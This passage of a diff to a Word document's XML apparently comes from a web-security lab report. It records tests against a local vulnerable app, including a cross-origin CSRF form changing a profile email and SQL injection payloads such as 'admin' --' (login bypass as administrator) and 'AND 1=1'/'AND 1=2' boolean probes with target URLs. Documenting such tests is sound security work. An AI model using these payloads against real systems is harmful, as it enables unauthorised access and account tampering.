-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/vulnerable/profile</w:t>
+        <w:t>Vulnerable Version Csrf Setup</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Input or attack setup: External HTML form posts email=attacker@lab.invalid to localhost:8000 without a CSRF token</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Attacker form is hosted on a separate origin, localhost:8001.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:01.001Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8001/vulnerable?manual=1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2042,7 +2279,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="60109509">
+        <w:pict w14:anchorId="66F380ED">
           <v:shape id="_x0000_i1030" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId9" o:title=""/>
           </v:shape>
@@ -2071,7 +2308,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 10 of 41</w:t>
+        <w:t>Page 11 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2108,79 +2345,79 @@
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Vulnerable Csrf After</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Input or attack setup: External POST followed by authenticated profile verification</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Attacker email is stored in the database.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:34.962Z. The screenshot footer displays PKT.</w:t>
+        <w:t>Vulnerable Version Csrf Response</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Input or attack setup: External POST: email=attacker@lab.invalid; no CSRF token</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Cross-origin form changed the authenticated profile.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:01.470Z. The screenshot footer displays PKT.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2229,7 +2466,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="77326497">
+        <w:pict w14:anchorId="26A5F04C">
           <v:shape id="_x0000_i1031" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId10" o:title=""/>
           </v:shape>
@@ -2258,7 +2495,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 11 of 41</w:t>
+        <w:t>Page 12 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2295,88 +2532,79 @@
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Vulnerable Sqli Easy</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Input or attack setup: username=admin' -- ; password=wrong</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Authentication bypassed as administrator.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:35.522Z. The screenshot foo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>ter displays PKT.</w:t>
+        <w:t>Vulnerable Version Csrf After</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Input or attack setup: External POST followed by authenticated profile verification</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Attacker email is stored in the database.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:01.919Z. The screenshot footer displays PKT.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2425,7 +2653,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="6349EB64">
+        <w:pict w14:anchorId="4700522D">
           <v:shape id="_x0000_i1032" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId11" o:title=""/>
           </v:shape>
@@ -2454,7 +2682,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 12 of 41</w:t>
+        <w:t>Page 13 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2490,104 +2718,103 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Vulnerable Sqli Intermediate True</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ENR-2026-001' AND 1=1 -- </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Enrollment found</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:36.039Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/vulnerable/enrollment?reference=ENR-2026-001%27+AND+1%3D1+--+</w:t>
+        <w:t>Vulnerable Version SQL Injection Easy</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Input or attack setup: username=admin' -- ; password=wrong</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Authentication bypassed as administrator.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:02.623Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/vulnerable/profile</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2612,7 +2839,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="25D842F5">
+        <w:pict w14:anchorId="725D5585">
           <v:shape id="_x0000_i1033" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId12" o:title=""/>
           </v:shape>
@@ -2641,7 +2868,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 13 of 41</w:t>
+        <w:t>Page 14 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2677,104 +2904,103 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Vulnerable Sqli Intermediate False</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ENR-2026-001' AND 1=2 -- </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: No matching enrollment</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:36.544Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/vulnerable/enrollment?reference=ENR-2026-001%27+AND+1%3D2+--+</w:t>
+        <w:t>Vulnerable Version Sql Injection Intermediate True</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Input or attack setup: ENR-2026-001' AND 1=1 -- </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
